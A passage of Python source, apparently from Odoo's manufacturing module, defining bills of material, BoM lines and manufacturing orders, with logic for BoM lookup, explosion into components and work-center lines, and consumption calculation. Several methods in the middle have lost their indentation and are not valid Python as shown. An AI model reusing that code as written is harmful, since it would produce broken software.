        'bom_line_ids': fields.one2many('mrp.bom.line', 'bom_id', 'BoM Lines', copy=True),
        'product_qty': fields.float('Product Quantity', required=True, digits_compute=dp.get_precision('Product Unit of Measure')),
        'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True, help="Unit of Measure (Unit of Measure) is the unit of measurement for the inventory control"),
        'date_start': fields.date('Valid From', help="Validity of this BoM. Keep empty if it's always valid."),
        'date_stop': fields.date('Valid Until', help="Validity of this BoM. Keep empty if it's always valid."),
        'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of bills of material."),
        'routing_id': fields.many2one('mrp.routing', 'Routing', help="The list of operations (list of work centers) to produce the finished product. "\
                "The routing is mainly used to compute work center costs during operations and to plan future loads on work centers based on production planning."),
        'product_rounding': fields.float('Product Rounding', help="Rounding applied on the product quantity."),
        'product_efficiency': fields.float('Manufacturing Efficiency', required=True, help="A factor of 0.9 means a loss of 10% during the production process."),
        'property_ids': fields.many2many('mrp.property', string='Properties'),
        'company_id': fields.many2one('res.company', 'Company', required=True),
    }
    # Default UoM: the first product.uom record ordered by id.
    def _get_uom_id(self, cr, uid, *args):
        return self.pool["product.uom"].search(cr, uid, [], limit=1, order='id')[0]
    _defaults = {
        'active': lambda *a: 1,
        'product_qty': lambda *a: 1.0,
        'product_efficiency': lambda *a: 1.0,
        'product_rounding': lambda *a: 0.0,
        'type': lambda *a: 'normal',
        'product_uom': _get_uom_id,
        'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'mrp.bom', context=c),
    }
    _order = "sequence"
    def _bom_find(self, cr, uid, product_tmpl_id=None, product_id=None, properties=None, context=None):
        """ Finds BoM for particular product and product uom.
        @param product_tmpl_id: Selected product.
        @param product_uom: Unit of measure of a product.
        @param properties: List of related properties.
        @return: False or BoM id.
        """
        if properties is None:
            properties = []
        if product_id:
            if not product_tmpl_id:
                product_tmpl_id = self.pool['product.product'].browse(cr, uid, product_id, context=context).product_tmpl_id.id
            # Match either a variant-specific BoM or a template-wide one.
            domain = [
                '|',
                        ('product_id', '=', product_id),
                        '&',
                            ('product_id', '=', False),
                            ('product_tmpl_id', '=', product_tmpl_id)
            ]
        elif product_tmpl_id:
            domain = [('product_id', '=', False), ('product_tmpl_id', '=', product_tmpl_id)]
        else:
            # neither product nor template, makes no sense to search
            return False
        # Restrict to BoMs whose validity window covers today.
        domain = domain + [ '|', ('date_start', '=', False), ('date_start', '<=', time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)),
                            '|', ('date_stop', '=', False), ('date_stop', '>=', time.strftime(DEFAULT_SERVER_DATETIME_FORMAT))]
        # order to prioritize bom with product_id over the one without
        ids = self.search(cr, uid, domain, order='product_id', context=context)
        # Search a BoM which has all properties specified, or if you can not find one, you could
        # pass a BoM without any properties
        bom_empty_prop = False
        for bom in self.pool.get('mrp.bom').browse(cr, uid, ids, context=context):
            if not set(map(int, bom.property_ids or [])) - set(properties or []):
                if properties and not bom.property_ids:
                    # Property-less fallback; kept only if nothing better matches.
                    bom_empty_prop = bom.id
                else:
                    return bom.id
        return bom_empty_prop
    def _bom_explode(self, cr, uid, bom, product, factor, properties=None, level=0, routing_id=False, previous_products=None, master_bom=None, context=None):
        """ Finds Products and Work Centers for related BoM for manufacturing order.
        @param bom: BoM of particular product template.
        @param product: Select a particular variant of the BoM. If False use BoM without variants.
        @param factor: Factor represents the quantity, but in UoM of the BoM, taking into account the numbers produced by the BoM
        @param properties: A List of properties Ids.
        @param level: Depth level to find BoM lines starts from 10.
        @param previous_products: List of product previously use by bom explore to avoid recursion
        @param master_bom: When recursion, used to display the name of the master bom
        @return: result: List of dictionaries containing product details.
                 result2: List of dictionaries containing Work Center details.
        """
        uom_obj = self.pool.get("product.uom")
        routing_obj = self.pool.get('mrp.routing')
        master_bom = master_bom or bom
        # Apply efficiency loss, then round up to the rounding step.
        def _factor(factor, product_efficiency, product_rounding):
            factor = factor / (product_efficiency or 1.0)
            factor = _common.ceiling(factor, product_rounding)
            if factor < product_rounding:
                factor = product_rounding
            return factor
        factor = _factor(factor, bom.product_efficiency, bom.product_rounding)
        result = []
        result2 = []
        routing = (routing_id and routing_obj.browse(cr, uid, routing_id)) or bom.routing_id or False
        if routing:
            # One work-order entry per routing operation; 'hour' folds in
            # setup (time_start), cleanup (time_stop) and per-cycle time.
            for wc_use in routing.workcenter_lines:
                wc = wc_use.workcenter_id
                d, m = divmod(factor, wc_use.workcenter_id.capacity_per_cycle)
                mult = (d + (m and 1.0 or 0.0))
                cycle = mult * wc_use.cycle_nbr
                result2.append({
                    'name': tools.ustr(wc_use.name) + ' - ' + tools.ustr(bom.product_tmpl_id.name_get()[0][1]),
                    'workcenter_id': wc.id,
                    'sequence': level + (wc_use.sequence or 0),
                    'cycle': cycle,
                    'hour': float(wc_use.hour_nbr * mult + ((wc.time_start or 0.0) + (wc.time_stop or 0.0) + cycle * (wc.time_cycle or 0.0)) * (wc.time_efficiency or 1.0)),
                })
        for bom_line_id in bom.bom_line_ids:
            # Skip lines outside their validity window.
            if bom_line_id.date_start and bom_line_id.date_start > time.strftime(DEFAULT_SERVER_DATETIME_FORMAT) or \
                bom_line_id.date_stop and bom_line_id.date_stop < time.strftime(DEFAULT_SERVER_DATETIME_FORMAT):
                    continue
            # all bom_line_id variant values must be in the product
            if bom_line_id.attribute_value_ids:
                if not product or (set(map(int,bom_line_id.attribute_value_ids or [])) - set(map(int,product.attribute_value_ids))):
                    continue
            # Guard against a component that (indirectly) contains itself.
            if previous_products and bom_line_id.product_id.product_tmpl_id.id in previous_products:
                raise osv.except_osv(_('Invalid Action!'), _('BoM "%s" contains a BoM line with a product recursion: "%s".') % (master_bom.name,bom_line_id.product_id.name_get()[0][1]))
            quantity = _factor(bom_line_id.product_qty * factor, bom_line_id.product_efficiency, bom_line_id.product_rounding)
            bom_id = self._bom_find(cr, uid, product_id=bom_line_id.product_id.id, properties=properties, context=context)
            #If BoM should not behave like PhantoM, just add the product, otherwise explode further
            if bom_line_id.type != "phantom" and (not bom_id or self.browse(cr, uid, bom_id, context=context).type != "phantom"):
                result.append({
                    'name': bom_line_id.product_id.name,
                    'product_id': bom_line_id.product_id.id,
                    'product_qty': quantity,
                    'product_uom': bom_line_id.product_uom.id,
                    'product_uos_qty': bom_line_id.product_uos and _factor(bom_line_id.product_uos_qty * factor, bom_line_id.product_efficiency, bom_line_id.product_rounding) or False,
                    'product_uos': bom_line_id.product_uos and bom_line_id.product_uos.id or False,
                })
            elif bom_id:
                # Phantom line: recurse into the component's own BoM.
                all_prod = [bom.product_tmpl_id.id] + (previous_products or [])
                bom2 = self.browse(cr, uid, bom_id, context=context)
                # We need to convert to units/UoM of chosen BoM
                factor2 = uom_obj._compute_qty(cr, uid, bom_line_id.product_uom.id, quantity, bom2.product_uom.id)
                quantity2 = factor2 / bom2.product_qty
                res = self._bom_explode(cr, uid, bom2, bom_line_id.product_id, quantity2,
                    properties=properties, level=level + 10, previous_products=all_prod, master_bom=master_bom, context=context)
                result = result + res[0]
                result2 = result2 + res[1]
            else:
                raise osv.except_osv(_('Invalid Action!'), _('BoM "%s" contains a phantom BoM line but the product "%s" does not have any BoM defined.') % (master_bom.name,bom_line_id.product_id.name_get()[0][1]))
        return result, result2
    def copy_data(self, cr, uid, id, default=None, context=None):
        """Duplicate a BoM, suffixing the copy's name with " (copy)"."""
        if default is None:
            default = {}
        bom_data = self.read(cr, uid, id, [], context=context)
        default.update(name=_("%s (copy)") % (bom_data['name']))
        return super(mrp_bom, self).copy_data(cr, uid, id, default, context=context)
    def onchange_uom(self, cr, uid, ids, product_tmpl_id, product_uom, context=None):
        """Onchange: warn and reset the UoM if it is not in the product's UoM category."""
        res = {'value': {}}
        if not product_uom or not product_tmpl_id:
            return res
        product = self.pool.get('product.template').browse(cr, uid, product_tmpl_id, context=context)
        uom = self.pool.get('product.uom').browse(cr, uid, product_uom, context=context)
        if uom.category_id.id != product.uom_id.category_id.id:
            res['warning'] = {'title': _('Warning'), 'message': _('The Product Unit of Measure you chose has a different category than in the product form.')}
            res['value'].update({'product_uom': product.uom_id.id})
        return res
    def onchange_product_tmpl_id(self, cr, uid, ids, product_tmpl_id, product_qty=0, context=None):
        """ Changes UoM and name if product_id changes.
        @param product_id: Changed product_id
        @return:  Dictionary of changed values
        """
        res = {}
        if product_tmpl_id:
            prod = self.pool.get('product.template').browse(cr, uid, product_tmpl_id, context=context)
            res['value'] = {
                'name': prod.name,
                'product_uom': prod.uom_id.id,
            }
        return res
class mrp_bom_line(osv.osv):
    """One component line of a bill of material (a product and its quantity)."""
    _name = 'mrp.bom.line'
    _order = "sequence"
    def _get_child_bom_lines(self, cr, uid, ids, field_name, arg, context=None):
        """If the BOM line refers to a BOM, return the ids of the child BOM lines"""
        bom_obj = self.pool['mrp.bom']
        res = {}
        for bom_line in self.browse(cr, uid, ids, context=context):
            bom_id = bom_obj._bom_find(cr, uid,
                product_tmpl_id=bom_line.product_id.product_tmpl_id.id,
                product_id=bom_line.product_id.id, context=context)
            if bom_id:
                child_bom = bom_obj.browse(cr, uid, bom_id, context=context)
                res[bom_line.id] = [x.id for x in child_bom.bom_line_ids]
            else:
                # No BoM for this component: the function field returns False.
                res[bom_line.id] = False
        return res
    _columns = {
        'type': fields.selection([('normal', 'Normal'), ('phantom', 'Phantom')], 'BoM Line Type', required=True,
                help="Phantom: this product line will not appear in the raw materials of manufacturing orders,"
                    "it will be directly replaced by the raw materials of its own BoM, without triggering"
                    "an extra manufacturing order."),
        'product_id': fields.many2one('product.product', 'Product', required=True),
        'product_uos_qty': fields.float('Product UOS Qty'),
        'product_uos': fields.many2one('product.uom', 'Product UOS', help="Product UOS (Unit of Sale) is the unit of measurement for the invoicing and promotion of stock."),
        'product_qty': fields.float('Product Quantity', required=True, digits_compute=dp.get_precision('Product Unit of Measure')),
        'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True,
            help="Unit of Measure (Unit of Measure) is the unit of measurement for the inventory control"),
        'date_start': fields.date('Valid From', help="Validity of component. Keep empty if it's always valid."),
        'date_stop': fields.date('Valid Until', help="Validity of component. Keep empty if it's always valid."),
        'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying."),
        'routing_id': fields.many2one('mrp.routing', 'Routing', help="The list of operations (list of work centers) to produce the finished product. The routing is mainly used to compute work center costs during operations and to plan future loads on work centers based on production planning."),
        'product_rounding': fields.float('Product Rounding', help="Rounding applied on the product quantity."),
        'product_efficiency': fields.float('Manufacturing Efficiency', required=True, help="A factor of 0.9 means a loss of 10% within the production process."),
        'property_ids': fields.many2many('mrp.property', string='Properties'), #Not used
        'bom_id': fields.many2one('mrp.bom', 'Parent BoM', ondelete='cascade', select=True, required=True),
        # The line only applies to product variants carrying ALL these
        # attribute values (checked in mrp_bom._bom_explode).
        'attribute_value_ids': fields.many2many('product.attribute.value', string='Variants', help="BOM Product Variants needed form apply this line."),
        'child_line_ids': fields.function(_get_child_bom_lines, relation="mrp.bom.line", string="BOM lines of the referred bom", type="one2many")
    }
    # Default UoM: the first product.uom record ordered by id.
    def _get_uom_id(self, cr, uid, *args):
        return self.pool["product.uom"].search(cr, uid, [], limit=1, order='id')[0]
    _defaults = {
        'product_qty': lambda *a: 1.0,
        'product_efficiency': lambda *a: 1.0,
        'product_rounding': lambda *a: 0.0,
        'type': lambda *a: 'normal',
        'product_uom': _get_uom_id,
    }
    _sql_constraints = [
        ('bom_qty_zero', 'CHECK (product_qty>0)', 'All product quantities must be greater than 0.\n' \
            'You should install the mrp_byproduct module if you want to manage extra products on BoMs !'),
    ]
    def onchange_uom(self, cr, uid, ids, product_id, product_uom, context=None):
        """Onchange: warn and reset the UoM if it is not in the product's UoM category."""
        res = {'value': {}}
        if not product_uom or not product_id:
            return res
        product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
        uom = self.pool.get('product.uom').browse(cr, uid, product_uom, context=context)
        if uom.category_id.id != product.uom_id.category_id.id:
            res['warning'] = {'title': _('Warning'), 'message': _('The Product Unit of Measure you chose has a different category than in the product form.')}
            res['value'].update({'product_uom': product.uom_id.id})
        return res
    def onchange_product_id(self, cr, uid, ids, product_id, product_qty=0, context=None):
        """ Changes UoM if product_id changes.
        @param product_id: Changed product_id
        @return:  Dictionary of changed values
        """
        res = {}
        if product_id:
            prod = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
            res['value'] = {
                'product_uom': prod.uom_id.id,
                'product_uos_qty': 0,
                'product_uos': False
            }
            # Derive UOS quantity from the product's uos coefficient when set.
            if prod.uos_id.id:
                res['value']['product_uos_qty'] = product_qty * prod.uos_coeff
                res['value']['product_uos'] = prod.uos_id.id
        return res
class mrp_production(osv.osv):
    """
    Production Orders / Manufacturing Orders
    """
    _name = 'mrp.production'
    _description = 'Manufacturing Order'
    # Field used as the reference date by date-based (calendar/Gantt) views.
    _date_name = 'date_planned'
    # Chatter/messaging support plus pending-action ("needaction") counters.
    _inherit = ['mail.thread', 'ir.needaction_mixin']
def _production_calc(self, cr, uid, ids, prop, unknow_none, context=None):
""" Calculates total hours and total no. of cycles for a production order.
@param prop: Name of field.
@param unknow_none:
@return: Dictionary of values.
"""
result = {}
for prod in self.browse(cr, uid, ids, context=context):
result[prod.id] = {
'hour_total': 0.0,
'cycle_total': 0.0,
}
for wc in prod.workcenter_lines:
result[prod.id]['hour_total'] += wc.hour
result[prod.id]['cycle_total'] += wc.cycle
return result
def _src_id_default(self, cr, uid, ids, context=None):
try:
location_model, location_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
def _dest_id_default(self, cr, uid, ids, context=None):
try:
location_model, location_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
def _get_progress(self, cr, uid, ids, name, arg, context=None):
""" Return product quantity percentage """
result = dict.fromkeys(ids, 100)
for mrp_production in self.browse(cr, uid, ids, context=context):
if mrp_production.product_qty:
done = 0.0
for move in mrp_production.move_created_ids2:
if not move.scrapped and move.product_id == mrp_production.product_id:
done += move.product_qty
result[mrp_production.id] = done / mrp_production.product_qty * 100
return result
def _moves_assigned(self, cr, uid, ids, name, arg, context=None):
""" Test whether all the consume lines are assigned """
res = {}
for production in self.browse(cr, uid, ids, context=context):
res[production.id] = True
states = [x.state != 'assigned' for x in production.move_lines if x]
if any(states) or len(states) == 0: #When no moves, ready_production will be False, but test_ready will pass
res[production.id] = False
return res
def _mrp_from_move(self, cr, uid, ids, context=None):
""" Return mrp"""
res = []
for move in self.browse(cr, uid, ids, context=context):
res += self.pool.get("mrp.production").search(cr, uid, [('move_lines', 'in', move.id)], context=context)
return res
_columns = {
'name': fields.char('Reference', required=True, readonly=True, states={'draft': [('readonly', False)]}, copy=False),
'origin': fields.char('Source Document', readonly=True, states={'draft': [('readonly', False)]},
help="Reference of the document that generated this production order request.", copy=False),
'priority': fields.selection([('0', 'Not urgent'), ('1', 'Normal'), ('2', 'Urgent'), ('3', 'Very Urgent')], 'Priority',
select=True, readonly=True, states=dict.fromkeys(['draft', 'confirmed'], [('readonly', False)])),
'product_id': fields.many2one('product.product', 'Product', required=True, readonly=True, states={'draft': [('readonly', False)]},
domain=[('type','!=','service')]),
'product_qty': fields.float('Product Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True, readonly=True, states={'draft': [('readonly', False)]}),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'product_uos_qty': fields.float('Product UoS Quantity', readonly=True, states={'draft': [('readonly', False)]}),
'product_uos': fields.many2one('product.uom', 'Product UoS', readonly=True, states={'draft': [('readonly', False)]}),
'progress': fields.function(_get_progress, type='float',
string='Production progress'),
'location_src_id': fields.many2one('stock.location', 'Raw Materials Location', required=True,
readonly=True, states={'draft': [('readonly', False)]},
help="Location where the system will look for components."),
'location_dest_id': fields.many2one('stock.location', 'Finished Products Location', required=True,
readonly=True, states={'draft': [('readonly', False)]},
help="Location where the system will stock the finished products."),
'date_planned': fields.datetime('Scheduled Date', required=True, select=1, readonly=True, states={'draft': [('readonly', False)]}, copy=False),
'date_start': fields.datetime('Start Date', select=True, readonly=True, copy=False),
'date_finished': fields.datetime('End Date', select=True, readonly=True, copy=False),
'bom_id': fields.many2one('mrp.bom', 'Bill of Material', readonly=True, states={'draft': [('readonly', False)]},
help="Bill of Materials allow you to define the list of required raw materials to make a finished product."),
'routing_id': fields.many2one('mrp.routing', string='Routing', on_delete='set null', readonly=True, states={'draft': [('readonly', False)]},
help="The list of operations (list of work centers) to produce the finished product. The routing is mainly used to compute work center costs during operations and to plan future loads on work centers based on production plannification."),
'move_prod_id': fields.many2one('stock.move', 'Product Move', readonly=True, copy=False),
'move_lines': fields.one2many('stock.move', 'raw_material_production_id', 'Products to Consume',
domain=[('state', 'not in', ('done', 'cancel'))], readonly=True, states={'draft': [('readonly', False)]}),
'move_lines2': fields.one2many('stock.move', 'raw_material_production_id', 'Consumed Products',
domain=[('state', 'in', ('done', 'cancel'))], readonly=True),
'move_created_ids': fields.one2many('stock.move', 'production_id', 'Products to Produce',
domain=[('state', 'not in', ('done', 'cancel'))], readonly=True),
'move_created_ids2': fields.one2many('stock.move', 'production_id', 'Produced Products',
domain=[('state', 'in', ('done', 'cancel'))], readonly=True),
'product_lines': fields.one2many('mrp.production.product.line', 'production_id', 'Scheduled goods',
readonly=True),
'workcenter_lines': fields.one2many('mrp.production.workcenter.line', 'production_id', 'Work Centers Utilisation',
readonly=True, states={'draft': [('readonly', False)]}),
'state': fields.selection(
[('draft', 'New'), ('cancel', 'Cancelled'), ('confirmed', 'Awaiting Raw Materials'),
('ready', 'Ready to Produce'), ('in_production', 'Production Started'), ('done', 'Done')],
string='Status', readonly=True,
track_visibility='onchange', copy=False,
help="When the production order is created the status is set to 'Draft'.\n\
If the order is confirmed the status is set to 'Waiting Goods'.\n\
If any exceptions are there, the status is set to 'Picking Exception'.\n\
If the stock is available then the status is set to 'Ready to Produce'.\n\
When the production gets started then the status is set to 'In Production'.\n\
When the production is over, the status is set to 'Done'."),
'hour_total': fields.function(_production_calc, type='float', string='Total Hours', multi='workorder', store=True),
'cycle_total': fields.function(_production_calc, type='float', string='Total Cycles', multi='workorder', store=True),
'user_id': fields.many2one('res.users', 'Responsible'),
'company_id': fields.many2one('res.company', 'Company', required=True),
'ready_production': fields.function(_moves_assigned, type='boolean', store={'stock.move': (_mrp_from_move, ['state'], 10)}),
}
_defaults = {
'priority': lambda *a: '1',
'state': lambda *a: 'draft',
'date_planned': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'product_qty': lambda *a: 1.0,
'user_id': lambda self, cr, uid, c: uid,
'name': lambda x, y, z, c: x.pool.get('ir.sequence').get(y, z, 'mrp.production') or '/',
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'mrp.production', context=c),
'location_src_id': _src_id_default,
'location_dest_id': _dest_id_default
}
_sql_constraints = [
('name_uniq', 'unique(name, company_id)', 'Reference must be unique per Company!'),
]
_order = 'priority desc, date_planned asc'
def _check_qty(self, cr, uid, ids, context=None):
for order in self.browse(cr, uid, ids, context=context):
if order.product_qty <= 0:
return False
return True
_constraints = [
(_check_qty, 'Order quantity cannot be negative or zero!', ['product_qty']),
]
def unlink(self, cr, uid, ids, context=None):
for production in self.browse(cr, uid, ids, context=context):
if production.state not in ('draft', 'cancel'):
raise osv.except_osv(_('Invalid Action!'), _('Cannot delete a manufacturing order in state \'%s\'.') % production.state)
return super(mrp_production, self).unlink(cr, uid, ids, context=context)
def location_id_change(self, cr, uid, ids, src, dest, context=None):
""" Changes destination location if source location is changed.
@param src: Source location id.
@param dest: Destination location id.
@return: Dictionary of values.
"""
if dest:
return {}
if src:
return {'value': {'location_dest_id': src}}
return {}
def product_id_change(self, cr, uid, ids, product_id, product_qty=0, context=None):
""" Finds UoM of changed product.
@param product_id: Id of changed product.
@return: Dictionary of values.
"""
result = {}
if not product_id:
return {'value': {
'product_uom': False,
'bom_id': False,
'routing_id': False,
'product_uos_qty': 0,
'product_uos': False
}}
bom_obj = self.pool.get('mrp.bom')
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
bom_id = bom_obj._bom_find(cr, uid, product_id=product.id, properties=[], context=context)
routing_id = False
if bom_id:
bom_point = bom_obj.browse(cr, uid, bom_id, context=context)
routing_id = bom_point.routing_id.id or False
product_uom_id = product.uom_id and product.uom_id.id or False
result['value'] = {'product_uos_qty': 0, 'product_uos': False, 'product_uom': product_uom_id, 'bom_id': bom_id, 'routing_id': routing_id}
if product.uos_id.id:
result['value']['product_uos_qty'] = product_qty * product.uos_coeff
result['value']['product_uos'] = product.uos_id.id
return result
def bom_id_change(self, cr, uid, ids, bom_id, context=None):
""" Finds routing for changed BoM.
@param product: Id of product.
@return: Dictionary of values.
"""
if not bom_id:
return {'value': {
'routing_id': False
}}
bom_point = self.pool.get('mrp.bom').browse(cr, uid, bom_id, context=context)
routing_id = bom_point.routing_id.id or False
result = {
'routing_id': routing_id
}
return {'value': result}
    def _action_compute_lines(self, cr, uid, ids, properties=None, context=None):
        """ Compute product_lines and workcenter_lines from BoM structure.

        Wipes both one2many tables and rebuilds them by exploding the order's
        BoM (finding and storing one if the order has none yet).
        @param properties: list of mrp.property ids used to select the BoM
        @return: product_lines (of the last order processed)
        """
        if properties is None:
            properties = []
        results = []
        bom_obj = self.pool.get('mrp.bom')
        uom_obj = self.pool.get('product.uom')
        prod_line_obj = self.pool.get('mrp.production.product.line')
        workcenter_line_obj = self.pool.get('mrp.production.workcenter.line')
        for production in self.browse(cr, uid, ids, context=context):
            #unlink product_lines
            # SUPERUSER_ID: the mrp user may lack unlink rights on these tables.
            prod_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.product_lines], context=context)
            #unlink workcenter_lines
            workcenter_line_obj.unlink(cr, SUPERUSER_ID, [line.id for line in production.workcenter_lines], context=context)
            # search BoM structure and route
            bom_point = production.bom_id
            bom_id = production.bom_id.id
            if not bom_point:
                # No BoM on the order yet: look one up for the product and
                # persist it (with its routing) on the order.
                bom_id = bom_obj._bom_find(cr, uid, product_id=production.product_id.id, properties=properties, context=context)
                if bom_id:
                    bom_point = bom_obj.browse(cr, uid, bom_id)
                    routing_id = bom_point.routing_id.id or False
                    self.write(cr, uid, [production.id], {'bom_id': bom_id, 'routing_id': routing_id})
            if not bom_id:
                raise osv.except_osv(_('Error!'), _("Cannot find a bill of material for this product."))
            # get components and workcenter_lines from BoM structure
            # Conversion of the order quantity into the BoM's UoM.
            factor = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, bom_point.product_uom.id)
            # product_lines, workcenter_lines
            results, results2 = bom_obj._bom_explode(cr, uid, bom_point, production.product_id, factor / bom_point.product_qty, properties, routing_id=production.routing_id.id, context=context)
            # reset product_lines in production order
            for line in results:
                line['production_id'] = production.id
                prod_line_obj.create(cr, uid, line)
            #reset workcenter_lines in production order
            for line in results2:
                line['production_id'] = production.id
                workcenter_line_obj.create(cr, uid, line)
        return results
def action_compute(self, cr, uid, ids, properties=None, context=None):
""" Computes bills of material of a product.
@param properties: List containing dictionaries of properties.
@return: No. of products.
"""
return len(self._action_compute_lines(cr, uid, ids, properties=properties, context=context))
    def action_cancel(self, cr, uid, ids, context=None):
        """ Cancels the production order and related stock moves.

        Cancels the pending produce moves, then the pending consume moves,
        flags the orders 'cancel', and finally puts any procurement that
        triggered them into exception so the scheduler reports the gap.
        @return: True
        """
        if context is None:
            context = {}
        move_obj = self.pool.get('stock.move')
        for production in self.browse(cr, uid, ids, context=context):
            if production.move_created_ids:
                move_obj.action_cancel(cr, uid, [x.id for x in production.move_created_ids])
            move_obj.action_cancel(cr, uid, [x.id for x in production.move_lines])
        self.write(cr, uid, ids, {'state': 'cancel'})
        # Put related procurements in exception
        proc_obj = self.pool.get("procurement.order")
        procs = proc_obj.search(cr, uid, [('production_id', 'in', ids)], context=context)
        if procs:
            proc_obj.write(cr, uid, procs, {'state': 'exception'}, context=context)
        return True
    def action_ready(self, cr, uid, ids, context=None):
        """ Changes the production state to Ready and location id of stock move.

        Also creates the finished-product move if missing, and realigns the
        chained output move's source with the order's destination location.
        @return: True
        """
        move_obj = self.pool.get('stock.move')
        self.write(cr, uid, ids, {'state': 'ready'})
        for production in self.browse(cr, uid, ids, context=context):
            if not production.move_created_ids:
                # No produce move yet (e.g. order confirmed before this fix-up).
                self._make_production_produce_line(cr, uid, production, context=context)
            if production.move_prod_id and production.move_prod_id.location_id.id != production.location_dest_id.id:
                move_obj.write(cr, uid, [production.move_prod_id.id],
                        {'location_id': production.location_dest_id.id})
        return True
    def action_production_end(self, cr, uid, ids, context=None):
        """ Changes production state to Finish and writes finished date.

        Posts work-center costs to analytic accounting first, then marks the
        orders done and lets the linked procurements re-check themselves.
        @return: result of the state/date write()
        """
        for production in self.browse(cr, uid, ids):
            self._costs_generate(cr, uid, production)
        write_res = self.write(cr, uid, ids, {'state': 'done', 'date_finished': time.strftime('%Y-%m-%d %H:%M:%S')})
        # Check related procurements
        proc_obj = self.pool.get("procurement.order")
        procs = proc_obj.search(cr, uid, [('production_id', 'in', ids)], context=context)
        proc_obj.check(cr, uid, procs, context=context)
        return write_res
def test_production_done(self, cr, uid, ids):
""" Tests whether production is done or not.
@return: True or False
"""
res = True
for production in self.browse(cr, uid, ids):
if production.move_lines:
res = False
if production.move_created_ids:
res = False
return res
def _get_subproduct_factor(self, cr, uid, production_id, move_id=None, context=None):
""" Compute the factor to compute the qty of procucts to produce for the given production_id. By default,
it's always equal to the quantity encoded in the production order or the production wizard, but if the
module mrp_subproduct is installed, then we must use the move_id to identify the product to produce
and its quantity.
:param production_id: ID of the mrp.order
:param move_id: ID of the stock move that needs to be produced. Will be used in mrp_subproduct.
:return: The factor to apply to the quantity that we should produce for the given production order.
"""
return 1
def _get_produced_qty(self, cr, uid, production, context=None):
''' returns the produced quantity of product 'production.product_id' for the given production, in the product UoM
'''
produced_qty = 0
for produced_product in production.move_created_ids2:
if (produced_product.scrapped) or (produced_product.product_id.id != production.product_id.id):
continue
produced_qty += produced_product.product_qty
return produced_qty
def _get_consumed_data(self, cr, uid, production, context=None):
''' returns a dictionary containing for each raw material of the given production, its quantity already consumed (in the raw material UoM)
'''
consumed_data = {}
# Calculate already consumed qtys
for consumed in production.move_lines2:
if consumed.scrapped:
continue
if not consumed_data.get(consumed.product_id.id, False):
consumed_data[consumed.product_id.id] = 0
consumed_data[consumed.product_id.id] += consumed.product_qty
return consumed_data
    def _calculate_qty(self, cr, uid, production, product_qty=0.0, context=None):
        """
        Calculates the quantity still needed to produce an extra number of products.
        product_qty is in the uom of the product.

        For every scheduled raw material, computes the share still to consume
        (pro-rated when producing less than the full order) and splits that
        quantity per production lot using the quants reserved on the order's
        consume moves; leftover quantity is reported under the False lot.
        @return: list of {'product_id', 'product_qty', 'lot_id'} dictionaries
        """
        quant_obj = self.pool.get("stock.quant")
        uom_obj = self.pool.get("product.uom")
        produced_qty = self._get_produced_qty(cr, uid, production, context=context)
        consumed_data = self._get_consumed_data(cr, uid, production, context=context)
        #In case no product_qty is given, take the remaining qty to produce for the given production
        if not product_qty:
            product_qty = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, production.product_id.uom_id.id) - produced_qty
        production_qty = uom_obj._compute_qty(cr, uid, production.product_uom.id, production.product_qty, production.product_id.uom_id.id)
        # Planned consumption per raw material, in the raw material's UoM.
        scheduled_qty = {}
        for scheduled in production.product_lines:
            if scheduled.product_id.type == 'service':
                continue
            qty = uom_obj._compute_qty(cr, uid, scheduled.product_uom.id, scheduled.product_qty, scheduled.product_id.uom_id.id)
            if scheduled_qty.get(scheduled.product_id.id):
                scheduled_qty[scheduled.product_id.id] += qty
            else:
                scheduled_qty[scheduled.product_id.id] = qty
        # dicts: {product_id: {lot_id (or False): qty}}
        dicts = {}
        # Find product qty to be consumed and consume it
        for product_id in scheduled_qty.keys():
            consumed_qty = consumed_data.get(product_id, 0.0)
            # qty available for consume and produce
            sched_product_qty = scheduled_qty[product_id]
            qty_avail = sched_product_qty - consumed_qty
            if qty_avail <= 0.0:
                # there will be nothing to consume for this raw material
                continue
            if not dicts.get(product_id):
                dicts[product_id] = {}
            # total qty of consumed product we need after this consumption
            if product_qty + produced_qty <= production_qty:
                total_consume = ((product_qty + produced_qty) * sched_product_qty / production_qty)
            else:
                total_consume = sched_product_qty
            qty = total_consume - consumed_qty
            # Search for quants related to this related move
            for move in production.move_lines:
                if qty <= 0.0:
                    break
                if move.product_id.id != product_id:
                    continue
                q = min(move.product_qty, qty)
                quants = quant_obj.quants_get_prefered_domain(cr, uid, move.location_id, move.product_id, q, domain=[('qty', '>', 0.0)],
                                                     prefered_domain_list=[[('reservation_id', '=', move.id)]], context=context)
                for quant, quant_qty in quants:
                    if quant:
                        lot_id = quant.lot_id.id
                        if not product_id in dicts.keys():
                            dicts[product_id] = {lot_id: quant_qty}
                        elif lot_id in dicts[product_id].keys():
                            dicts[product_id][lot_id] += quant_qty
                        else:
                            dicts[product_id][lot_id] = quant_qty
                        qty -= quant_qty
            if qty > 0:
                # Not fully covered by reserved quants: no specific lot.
                if dicts[product_id].get(False):
                    dicts[product_id][False] += qty
                else:
                    dicts[product_id][False] = qty
        # Flatten the per-lot mapping into wizard-style consume lines.
        consume_lines = []
        for prod in dicts.keys():
            for lot, qty in dicts[prod].items():
